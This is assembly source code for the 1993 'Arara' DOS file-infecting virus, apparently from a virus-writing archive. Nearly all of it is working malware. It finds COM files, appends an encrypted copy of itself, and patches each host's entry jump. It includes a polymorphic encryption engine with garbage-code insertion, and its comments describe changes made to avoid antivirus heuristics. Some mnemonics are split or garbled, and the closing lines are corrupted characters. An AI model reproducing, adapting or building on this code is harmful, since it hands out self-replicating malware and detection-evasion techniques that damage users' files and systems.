2022-08-21 09:07:57 +00:00
;
; [Arara] Virus
; Generated by [TVG]
; Minor modifications done to avoid heuristic detection by TbScan
; Cloaked with a minor polymorphic protection device
; Created on Monday November 11, 1993
; Written for compilation in A86 pd assembler
;
; This is not a major virus, but I want to see how they react in the Virus
; summary. Maybe they say it's from Bulgaria because of the language. Well,
; if you want me to write something (fairly neutral) about satanism for a mag
; then say it so. I try to keep it interesting...
;
; John Tardy
JMP MAIN
DB '<27> '
MAIN: CALL GETOFS
GETOFS: MOV BP , SP
MOV BP , SS :[ BP ]
PUSH AX
SUB BP , GETOFS
MAINVIR EQU $
CALL RANDOMIZE
MOV AX ,[ ORGPRG ][ BP ]
LEA DI , 100H
STOSW
MOV AX ,[ ORGPRG ][ 2 ][ BP ]
STOSW
MOV AH , 1AH
MOV DX , 0FD00H
INT 21H
CALL CH ANGE
MOV AH , 4EH
SEARCH: LEA DX , FILESPEC [ BP ]
XOR CX , CX
INT 21H
JNC NOERROR
JMP READY
NOERROR: MOV AX , 4300H
MOV DX , 0FD1EH
INT 21H
PUSH CX
MOV AX , 4301H
XOR CX , CX
INT 21H
MOV AX , 3D02H
MOV DX , 0FD1EH
INT 21H
XCHG AX , BX
MOV AX , 5700H
INT 21H
PUSH CX
PUSH DX
MOV AH , 3FH
LEA DX , ORGPRG [ BP ]
MOV CX , 4
INT 21H
MOV CX , W ORGPRG [ BP ]
XOR CX , 0FFFFH
CMP CX , 0B2A5H
JE EXEFILE
CMP CX , 0A5B2H
JE EXEFILE
CMP B ORGPRG [ BP ][ 3 ], '<27> '
JE EXEFILE
MOV AX , 4202H
XOR CX , CX
CWD
INT 21H
SUB AX , 3
MOV JUMP [ 1 ][ BP ], AX
PUSH BX
PUSH AX
CALL CH ANGE
MOV DS , CS
LEA SI , MAIN [ BP ]
MOV CX , VIRLEN
MOV ES , CS
LEA DI , START [ BP ]
POP DX
ADD DX , 103H
MOV AX , 3
CALL ENCRYPT
POP BX
MOV AH , 40H
MOV DS , CS
LEA DX , START [ BP ]
INT 21H
MOV AX , 4200H
XOR CX , CX
CWD
INT 21H
MOV AH , 40H
LEA DX , JUMP [ BP ]
MOV CX , 4
INT 21H
CALL CL OSE
JMP READY
EXEFILE: CALL CL OSE
MOV AH , 4FH
JMP SEARCH
READY EQU $
ERROR: MOV AH , 1AH
MOV DX , 80H
INT 21H
MOV DS , CS
POP AX
MOV BX , 0FEFFH
XOR BX , 0FFFFH
JMP BX
CLOSE: POP SI
POP DX
POP CX
MOV AX , 5700H
INC AX
INT 21H
MOV AH , 3EH
INT 21H
POP CX
MOV AX , 4300H
INC AX
MOV DX , 0FD1EH
INT 21H
MOV DS , CS
MOV ES , CS
PUSH SI
RET
DB '[ARARA]'
CHANGE: MOV AX , W WEXL [ BP ]
XCHG AL , AH
MOV W WEXL [ BP ], AX
RET
;---------------------------------------------------------------------------
;
; Encryption engine
;
;---------------------------------------------------------------------------
RANDOMIZE: MOV CX , MTLEN
INCREASE: MOV SI , CX
INC B MT [ SI ][ - 1 ][ BP ]
LOOP INCREASE
CHECKIT: MOV CX , MTMAXLEN
CHECKVAL: MOV SI , CX
MOV AH , MT [ SI ][ - 1 ][ BP ]
MOV AL , MTMAX [ SI ][ - 1 ][ BP ]
CMP AH , AL
JB GOODVAL
MOV B MT [ SI ][ - 1 ][ BP ], 0
GOODVAL: LOOP CH ECKVAL
XOR AX , AX
MOV DS , AX
NOTZERO: MOV AL , B DS :[ 046CH ]
OR AL , AL
JZ NOTZERO
MOV DS , CS
MOV ENCRYPTVAL [ BP ], AL
RET
DUMMY1 DW 0 ; offset mov bx,si,di
DUMMY2 DW 0 ; offset loop
CALNEWCX DW 0
ENCRYPT: PUSH DS
PUSH SI
PUSH CX
MOV AMOUNT [ BP ], AX
MOV COUNTLOOP [ BP ], CX
MOV CALNEWCX [ BP ], DI
LEA SI , MT [ BP ]
CALL INSERTGARBAGE
XOR AX , AX
LODSB
PUSH AX
LEA BX , VAL2T [ BP ]
CALL USETABLE
ADD AX , W [ COUNTLOOP ][ BP ]
STOSW
LODSB
PUSH AX
CALL INSERTGARBAGE
LEA BX , VAL3SUB [ BP ]
CALL USETABLE
POP AX
SHL AX , 2
POP BX
ADD AX , BX
LEA BX , VAL3T [ BP ]
CALL USETABLE
CALL INSERTGARBAGE
LODSB
PUSH AX
PUSH AX
LEA BX , VAL1T [ BP ]
CALL USETABLE
MOV DUMMY1 [ BP ], DI
STOSW
CALL INSERTGARBAGE
MOV DUMMY2 [ BP ], DI
LODSB
LEA BX , VAL4T [ BP ]
CALL USETABLE
POP BX
LODSB
MOV FUNCTION [ BP ], AL
SHL AX , 2
ADD AX , BX
LEA BX , VAL5T [ BP ]
CALL USETABLE
MOV AL , B [ ENCRYPTVAL ][ BP ]
STOSB
CALL INSERTGARBAGE
POP AX
LEA BX , VAL6T [ BP ]
CALL USETABLE
LODSB
LEA BX , VAL7T [ BP ]
CALL USETABLE
MOV AX , DI
MOV BX , DUMMY2 [ BP ]
SUB AX , BX
NOT AX
STOSB
PUSH DI
MOV AX , CALNEWCX [ BP ]
SUB DI , AX
ADD DI , DX
MOV AX , DI
MOV DI , DUMMY1 [ BP ]
STOSW
POP DI
POP CX
POP SI
POP DS
CODEIT: LODSB
CMP B FUNCTION [ BP ], 0
JNE WHATELSE1
XOR AL , ENCRYPTVAL [ BP ]
JMP NOELSE
WHATELSE1: CMP B FUNCTION [ BP ], 1
JNE WHATELSE2
SUB AL , ENCRYPTVAL [ BP ]
JMP NOELSE
WHATELSE2: ADD AL , ENCRYPTVAL [ BP ]
NOELSE: STOSB
LOOP CODEIT
MOV CX , CALNEWCX [ BP ]
SUB DI , CX
MOV CX , DI
RET
USETABLE:
XLAT
STOSB
RET
INSERTGARBAGE: PUSH DS
PUSH SI
PUSH AX
PUSH CX
PUSH DS
PUSH SI
XOR AX , AX
MOV DS , AX
MOV AX , WORD PTR DS :[ 046CH ]
ADD AX , DI
SUB AX , SI
ADD AX , BP
ADD AX , WORD PTR CS :[ DI ][ BP ]
ADD AL , AH
ADD AX , CX
AND AX , 02H
AMOUNT EQU $ - 2
MOV CX , AX
AND AX , 7H
POP SI
POP DS
CMP CX , 0
JE NOGARBAGE
INSERT: LEA BX , RANDOMCODE [ BP ]
CALL USETABLE
ADD AX , DI
ADD AX , SI
ADD AX , WORD PTR CS :[ DI ][ BP ]
AND AX , 7
LOOP INSERT
NOGARBAGE: POP CX
POP AX
POP SI
POP DS
RET
MTMAX DB 4 ; MT 0
DB 10 ; MT 1
DB 3 ; MT 2
DB 2 ; MT 4
DB 3 ; MT 5
DB 2 ; MT 6
DB 6 ; MT 7
MTMAXLEN EQU $ - MTMAX
MT DB 0 ; MT 0
DB 0 ; MT 1
DB 0 ; MT 2
DB 0 ; MT 4
DB 0 ; MT 5
DB 0 ; MT 6
DB 0 ; MT 7
MTLEN EQU $ - MT
; Offset Encrypted part
ENCOFS DW 0
; Counterloop decryption
COUNTLOOP DW 0
; Encryption Valua
ENCRYPTVAL DB 0
; Function
FUNCTION DB 0 ; 0=xor, 1=add, 2=sub (xchange in encr)
; MT 0
VAL1T DB 0BBH , 0BEH , 0BFH ; Mov Bx,Si,Di
; MT 1
VAL2T DB 0B8H , 0BBH , 0BAH , 0BDH ; Mov Ax,Bx,Dx,Bp
; MT 2 V
VAL3SUB DB 089H , 087H , 087H , 031H , 001H , 009H
DB 08BH , 033H , 003H , 00BH ; NIEUW
; MT 1 H
VAL3T DB 0C1H , 0D9H , 0D1H , 0E9H ; Mov Ax,Bx,Dx,Bp -> Cx
DB 0C1H , 0CBH , 0CAH , 0CDH ; Xchg Ax,Bx,Dx,Bp -> Cx
DB 0C1H , 0D9H , 0D1H , 0E9H ; Xchg Ax,Bx,Dx,Bp <- Cx
DB 0C1H , 0D9H , 0D1H , 0E9H ; Xor Ax,Bx,Dx,Bp -> Cx
DB 0C1H , 0D9H , 0D1H , 0E9H ; Add Ax,Bx,Dx,Bp -> Cx
DB 0C1H , 0D9H , 0D1H , 0E9H ; Or Ax,Bx,Dx,Bp -> Cx
DB 0C8H , 0CBH , 0CAH , 0CDH ; NIEUW
DB 0C8H , 0CBH , 0CAH , 0CDH ;
DB 0C8H , 0CBH , 0CAH , 0CDH ;
DB 0C8H , 0CBH , 0CAH , 0CDH ;
; MT 4 H
VAL4T DB 080H , 082H ; 00 / 0000
; MT 5 V
; MT 0 H
VAL5T DB 037H , 034H , 035H , 037H ; Xor Bx,Si,Di,bx
DB 007H , 004H , 005H , 007H ; Add Bx,Si,Di,bx
DB 02FH , 02CH , 02DH , 02FH ; Sub Bx,Si,Di,bx
; MT 0 H
VAL6T DB 043H , 046H , 047H ; Inc Bx,Si,Di
; MT 6 H
VAL7T DB 0E0H , 0E2H ; Loop Equal Functions
; MT 7 H
RANDOMCODE DB 0FCH , 0F8H , 090H , 0F9H , 0F5H ; Random code
DB 0CCH , 0FBH , 02EH , 0F5H
FILESPEC DB '*.OCM' , 0
WEXL EQU FILESPEC + 2
JUMP DB 0E9H
DW 0
DB '<27> '
ORG PRG DB 0CDH , 020H , 'AR'
;
; The Eighteenth Enochian Key opens the gates of Hell and casts up Lucifer
; and his blessing.
;
; Enochian
DB 13 , 10 , 'ILASA MICALAZODA OLAPIRETA IALPEREJI BELIORE: DAS ODO BUSADIRE OIAD OUOARESA'
DB 13 , 10 , 'CAOSAGO: CASAREMEJI LAIADA ERANU BERINUTASA CAFAFAME DAS IVEMEDA AQOSO ADOHO'
DB 13 , 10 , 'MOZ, OD MAOFASA. BOLAPE COMO BELIORETA PAMEBETA. ZODACARE OD ZODAMERANU! ODO'
DB 13 , 10 , 'CICALE QAA. ZODOREJE, LAPE ZODIREDO NOCO MADA, HOATHAHE SAITAN!'
; English
; O thou mighty light and burning flame of comfort!, that unveilest the glory
; of Satan to the center of the Earth; in whom the great secrets of truth
; have their abiding; that is called in thy kingdom: "strength through joy,"
; and is not to be measured. Be thou a window of comfort unto me. Move there-
; fore, and appear! Open the mysteries of your creation! Be friendly unto me,
; for I am the same!, the true worshipper of the highest end ineffable King
; of Hell!
START EQU $
VIRLEN EQU $ - MAIN
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
